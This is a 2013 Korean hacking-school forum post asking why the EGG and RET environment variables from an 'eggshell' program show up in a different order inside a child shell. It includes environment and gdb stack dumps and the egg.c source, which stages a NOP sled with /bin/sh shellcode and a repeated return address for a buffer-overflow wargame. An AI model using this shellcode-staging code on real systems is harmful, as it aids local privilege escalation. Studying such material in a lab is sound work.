http://www.hackerschool.org/HS_Boards/zboard.php?AllArticle=true&no=1681 [복사]
putenv(egg)
putenv(buff)
이렇게 환경 변수를 추가했으면
printenv했을 때
EGG ~~~~~
RET ~~~~~
이렇게 아래 출력 결과처럼 나와야 하는데
새로운 쉘을 띄워놓고 printenv하면 2번째 출력 결과처럼
RET
EGG
이렇게 순서가 뒤집히고
환경 변수들 가운데 쯤에 들어가네요
왜 이런건지 알려주시면 정말 감사하겠습니다.
1.-----------------------------egg.c에 system(/bin/sh) 안 넣은 경우-------------------------------------------
(환경변수 출력은 egg.c에 출력 소스를 추가해서 한 것입니다.)
Using address: 0xbffffbd4
LESSOPEN=|/usr/bin/lesspipe.sh %s
USERNAME=
HISTSIZE=1000
HOSTNAME=BOF
LOGNAME=student
REMOTEHOST=110.35.139.193
MAIL=/var/spool/mail/student
TERM=xterm
HOSTTYPE=i386
PATH=/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/student/bin
HOME=/home/student
INPUTRC=/etc/inputrc
SHELL=/bin/bash
USER=student
BASH_ENV=/home/student/.bashrc
LANG=en_US
OSTYPE=Linux
SHLVL=1
LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;35:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:
_=./e
EGG=1A¡ÆF1U1E1EI¢æe1A¡Æ
[¢¶‹g1a¢¶g¢¶u1OI¢æe©¡yyy/bin/sh
RET=Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy
2.----------------------------egg에 system(/bin/sh) 추가 했을 때 환경변수 출력-------------------------------
[student@BOF student]$ printenv
LESSOPEN=|/usr/bin/lesspipe.sh %s
USERNAME=
HISTSIZE=1000
HOSTNAME=BOF
LOGNAME=student
REMOTEHOST=110.35.139.193
MAIL=/var/spool/mail/student
TERM=xterm
HOSTTYPE=i386
PATH=/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/student/bin
HOME=/home/student
INPUTRC=/etc/inputrc
SHELL=/bin/bash
USER=student
RET=Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny
EGG=1A¡ÆF1U1E1EI¢æe1A¡Æ
[¢¶‹g1a¢¶g¢¶u1OI¢æe©¡yyy/bin/sh
BASH_ENV=/home/student/.bashrc
LANG=en_US
OSTYPE=Linux
SHLVL=5
LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;35:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:
_=/usr/bin/printenv
--------------------------------------egg.c 소스-------------------------------------------------------------------
/*
 * egg.c ("eggshell" loader, as posted): builds two environment variables
 * and then spawns a shell that inherits them.
 *   EGG = "EGG=" followed by a run of NOP bytes and then the shellcode bytes
 *   RET = "RET=" followed by the value of `addr` repeated, one long per word
 * argv[1] = bsize, argv[2] = offset, argv[3] = eggsize; all parsed with
 * atoi(), which reports no errors, so non-numeric, zero or negative input
 * is accepted silently.
 */
int main(int argc, char *argv[])
{
char *buff, *ptr, *egg;
long *addr_ptr, addr;   /* NOTE: addr is never assigned anywhere in this body */
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i, eggsize=DEFAULT_EGG_SIZE;
/* A zero or negative size here makes malloc() below receive a huge size_t,
 * or makes the buff[bsize - 1] / egg[eggsize - 1] writes go out of bounds. */
if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) offset = atoi(argv[2]);
if (argc > 3) eggsize = atoi(argv[3]);
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);   /* exits with status 0 even though this is a failure path */
}
if (!(egg = malloc(eggsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
// addr = get_esp() - offset;
/* With the line above commented out, addr is read here uninitialized
 * (undefined behavior): the printed address and every word stored into
 * buff below are indeterminate. "%x" also expects unsigned int, while
 * addr is a long. */
printf("Using address: 0x%x\n", addr);
ptr = buff;
addr_ptr = (long *) ptr;
/* Fill buff with addr one long at a time. The index advances by 4 but is
 * compared against bsize, so a bsize that is not a multiple of 4 makes the
 * last store run past the allocation. */
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
ptr = egg;
/* NOP run first. eggsize - strlen(shellcode) - 1 is evaluated as size_t:
 * when eggsize < strlen(shellcode) + 1 the bound wraps to a huge value and
 * this loop writes far beyond egg. i (int) is converted to unsigned for
 * the comparison. */
for(i = 0; i < eggsize - strlen(shellcode) - 1; i++)
*(ptr++) = NOP;
/* shellcode bytes immediately after the NOP run */
for(i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
egg[eggsize - 1] = '\0';
/* Overwrite the first 4 bytes of each buffer with its "NAME=" prefix.
 * putenv() stores the pointer it is given rather than a copy, so buff and
 * egg must stay allocated for as long as environ is used (neither is freed). */
memcpy(egg,"EGG=",4);
putenv(egg);
memcpy(buff,"RET=",4);
putenv(buff);
// while( *environ)
// printf( "%s\n", *environ++);
// return 0;
/* Spawn a child shell that inherits this process's environ. putenv() appended
 * EGG and RET at the end of environ (output 1 above lists them last, after
 * "_"); printenv run from inside the child shell (output 2, SHLVL=5) shows
 * them in a different position, presumably because the child shell hands its
 * children an environment rebuilt from its own variable table rather than
 * passing environ through unchanged -- verify against the shell's source.
 * main() ends without a return statement. */
system("/bin/bash");
}
------------------------------------스택에 쌓인 환경 변수 출력------------------------------------------------
0xbffff2a2: "i686"
0xbffff2a7: "/home/student/get"
0xbffff2b9: "LESSOPEN=|/usr/bin/lesspipe.sh %s"
0xbffff2db: "USERNAME="
0xbffff2e5: "HISTSIZE=1000"
0xbffff2f3: "HOSTNAME=BOF"
0xbffff300: "LOGNAME=student"
0xbffff310: "REMOTEHOST=110.35.139.193"
0xbffff32a: "MAIL=/var/spool/mail/student"
0xbffff347: "TERM=xterm"
---Type <return> to continue, or q <return> to quit---
0xbffff352: "HOSTTYPE=i386"
0xbffff360: "PATH=/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/student/bin"
0xbffff3a3: "HOME=/home/student"
0xbffff3b6: "INPUTRC=/etc/inputrc"
0xbffff3cb: "SHELL=/bin/bash"
0xbffff3db: "USER=student"
0xbffff3e8: "RET=Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯"...
0xbffff4b0: "Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯"...
0xbffff578: "Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy"
0xbffff5e8: "EGG=", '\220' <repeats 196 times>...
0xbffff6b0: '\220' <repeats 200 times>...
0xbffff778: '\220' <repeats 200 times>...
0xbffff840: '\220' <repeats 200 times>...
0xbffff908: '\220' <repeats 200 times>...
0xbffff9d0: '\220' <repeats 200 times>...
0xbffffa98: '\220' <repeats 200 times>...
0xbffffb60: '\220' <repeats 200 times>...
0xbffffc28: '\220' <repeats 200 times>...
0xbffffcf0: '\220' <repeats 200 times>...
0xbffffdb8: "1A¡ÆF1U1E1EI\200e\0251A¡Æ\013[\211\037\213g\0041a\211g\004\211u1OI\200e©¡yyy/bin/sh"
0xbffffde8: "BASH_ENV=/home/student/.bashrc"
0xbffffe07: "LANG=en_US"
0xbffffe12: "OSTYPE=Linux"
0xbffffe1f: "SHLVL=3"
0xbffffe27: "LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01"...
0xbffffeef: ";32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;3"...
0xbfffffb7: "5:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:"
0xbfffffea: "/home/student/get"
Hit : 4136 Date : 2013/05/28 09:50